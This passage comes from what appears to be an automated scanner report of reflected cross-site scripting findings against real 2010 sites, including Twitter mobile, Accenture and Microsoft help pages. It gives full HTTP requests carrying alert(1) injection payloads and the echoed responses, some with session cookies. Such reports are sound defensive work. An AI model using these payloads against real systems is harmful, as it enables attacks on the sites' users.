The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc9e4"%3balert(1)//be7622a1d03 was submitted in the mpvc parameter. This input was echoed as fc9e4";alert(1)//be7622a1d03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&mpt=494963497&mpvc=fc9e4"%3balert(1)//be7622a1d03 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:54 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT
ETag: "6466be-b9e-4920c3dfb8800"
Accept-Ranges: bytes
Content-Length: 4057
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f85d9"%3balert(1)//b20b8991dcf was submitted in the mpck parameter. This input was echoed as f85d9";alert(1)//b20b8991dcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072f85d9"%3balert(1)//b20b8991dcf&mpt=1151838072&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:54 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT
ETag: "4c57d5-b94-48a1927b79200"
Accept-Ranges: bytes
Content-Length: 4084
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52fe"%3balert(1)//bb2e7f7b03d was submitted in the mpvc parameter. This input was echoed as b52fe";alert(1)//bb2e7f7b03d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&mpt=1151838072&mpvc=b52fe"%3balert(1)//bb2e7f7b03d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:52:01 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT
ETag: "4c57d5-b94-48a1927b79200"
Accept-Ranges: bytes
Content-Length: 4060
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b3b'onerror%3d'alert(1)'651885c1226 was submitted in the loc parameter. This input was echoed as 97b3b'onerror='alert(1)'651885c1226 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /js.ashx?pid=2B9C484E4C084CE1A90E33EB9CE8FE7B&tl=99337983945&did=a1254&loc=http%3A//www.xml.com/pub/a/2003/07/23/extendingrss.html%3F99584--%253E%253Cscript%253Ealert%281%29%253C/script%253E0a38ce97934%3D197b3b'onerror%3d'alert(1)'651885c1226&referer=http%3A//burp/show/23 HTTP/1.1
Host: jobs.hrkspjbs.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Nov 2010 01:52:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
HRDS: 281
Set-Cookie: hr=60d7d6c3f78c44f794606403cf69e5e9; expires=Fri, 21-Jan-2011 01:52:40 GMT; path=/
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 695
hr_208355=''; hr_208355+="<map name='directconnect208355'><area shape='rect' coords='0,0,189,195' href='http://jobserver.hirereach.net/Landingpage.aspx?jobid=a6690a3a84244a699f4d7eb4135afb4e&pid=2b9c4 ...[SNIP]... &jobid=a6690a3a84244a699f4d7eb4135afb4e&cid=60d7d6c3f78c44f794606403cf69e5e9&did=a1254&loc=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=197b3b'onerror='alert(1)'651885c1226' alt='' title='Matched by Hire Reach'/> ...[SNIP]...
1.112. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.twitter.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f14"><script>alert(1)</script>79a7c4dda04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?13f14"><script>alert(1)</script>79a7c4dda04=1 HTTP/1.1
Host: m.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 18:12:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1290363133-22708-20320
ETag: "bfebd129371ab9808d57aa079c920990"
Last-Modified: Sun, 21 Nov 2010 18:12:13 GMT
X-Runtime: 0.00750
Content-Type: text/html; charset=utf-8
Content-Length: 707
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=174.121.222.18.1290363133633094; path=/; expires=Sun, 28-Nov-10 18:12:13 GMT; domain=.twitter.com
Set-Cookie: guest_id=129036313363523026; path=/; expires=Tue, 21 Dec 2010 18:12:13 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: admobuu=c64bc7b04b5bb45d5dba8e834c130207; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCMXeom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiVlNzlmYzkzN2ZhODBkMDE0OWJhNTJkMWQ5YzljM2ZlYSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--eac5f95bacd4fb9510431d61a1ac5fae4eea0f2b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
1.113. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.twitter.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0be6"-alert(1)-"b367d71ddc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b0be6"-alert(1)-"b367d71ddc1=1 HTTP/1.1
Host: m.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 18:12:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1290363138-1587-53133
ETag: "5a53462e51f159b5b02b0067f8e451fa"
Last-Modified: Sun, 21 Nov 2010 18:12:18 GMT
X-Runtime: 0.00681
Content-Type: text/html; charset=utf-8
Content-Length: 662
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=174.121.222.18.1290363138896016; path=/; expires=Sun, 28-Nov-10 18:12:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=129036313889880210; path=/; expires=Tue, 21 Dec 2010 18:12:18 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: admobuu=11ab92267356f360020e6179577499a7; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCFTzom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiU1YWYzZDMyMzc4ZmE4NDQwMmYwM2NkZjhmZGMzMjYyMiIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--111c6193ffe736b7da547ec1fa7d08577e08217b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
1.114. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://myoutlook.accenture.com
Path: /cgi-bin/accenture.cfg/php/enduser/acct_login.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 725e2--><script>alert(1)</script>a0bf1b06325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?725e2--><script>alert(1)</script>a0bf1b06325=1 HTTP/1.1
Host: myoutlook.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:16:20 GMT
Server: Apache
P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:20 GMT
RNT-Time: D=109449 t=1290359780465908
RNT-Machine: 10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32005
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <head> <meta name="robots" content="noindex,nofollo ...[SNIP]... <input type="hidden" name="725e2--><script>alert(1)</script>a0bf1b06325" value="1" /> ...[SNIP]...
1.115. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://myoutlook.accenture.com
Path: /cgi-bin/accenture.cfg/php/enduser/acct_login.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8138"><script>alert(1)</script>e61542efaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?c8138"><script>alert(1)</script>e61542efaa3=1 HTTP/1.1
Host: myoutlook.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:16:18 GMT
Server: Apache
P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:18 GMT
RNT-Time: D=169171 t=1290359778593827
RNT-Machine: 04
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32003
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <head> <meta name="robots" content="noindex,nofollo ...[SNIP]... <input type="hidden" name="c8138"><script>alert(1)</script>e61542efaa3" value="1" /> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3851d</script><a>912587d3fc5 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110" s.channel="accenture/newsroom/pressreleases" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)doc ...[SNIP]...
The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19d7</script><a>acbabcf8454 was submitted in the n parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
/* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454" s.channel="accenture/newsroom/pressreleases" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write ...[SNIP]...
1.118. http://newsroom.accenture.com/article_display.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://newsroom.accenture.com
Path: /article_display.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 458c4</script><a>52134726541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article_display.cfm?article_id=5052&458c4</script><a>52134726541=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/article_display.cfm?article_id=5052&458c4</script><a>52134726541=1" s.channel="accenture/newsroom/pressreleases" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.wri ...[SNIP]...
1.119. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://newsroom.accenture.com
Path: /index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 595e2</script><a>14a24e4e77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm?595e2</script><a>14a24e4e77=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/index.cfm?595e2</script><a>14a24e4e77=1" s.channel="accenture/newsroom/home" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code ...[SNIP]...
1.120. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://newsroom.accenture.com
Path: /index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec10a"><a>31f449be3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /index.cfm?ec10a"><a>31f449be3b9=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the path_info request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 was submitted in the path_info parameter. This input was echoed as 74f0a"style="x:expression(alert(1))"137df798c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /login.cfm?path_info=%2F404%2Ecfm%3F404%3Bhttp%3A%2F%2Fnewsroom%2Eaccenture%2Ecom%3A80%2Fpr%2Bcontacts%2F74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.122. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://onlinehelp.microsoft.com
Path: /en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a39"><script>alert(1)</script>c3378771fa8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?35a39"><script>alert(1)</script>c3378771fa8=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADxBQAAeDkgSY5AxVbdEUS04pPjkw!!&M=1; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 21 Nov 2010 18:08:20 GMT
Content-Length: 43682
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beb2d"-alert(1)-"36f5ca8f95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:05 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=pot4a6kt25c09k94qncm5jc6o4; expires=Tue, 14-Dec-2010 21:42:25 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... <!-- s.pageName="opensource|blocks404"; s.server=""; s.channel="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ********* ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87f0"-alert(1)-"42d3f0ecc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
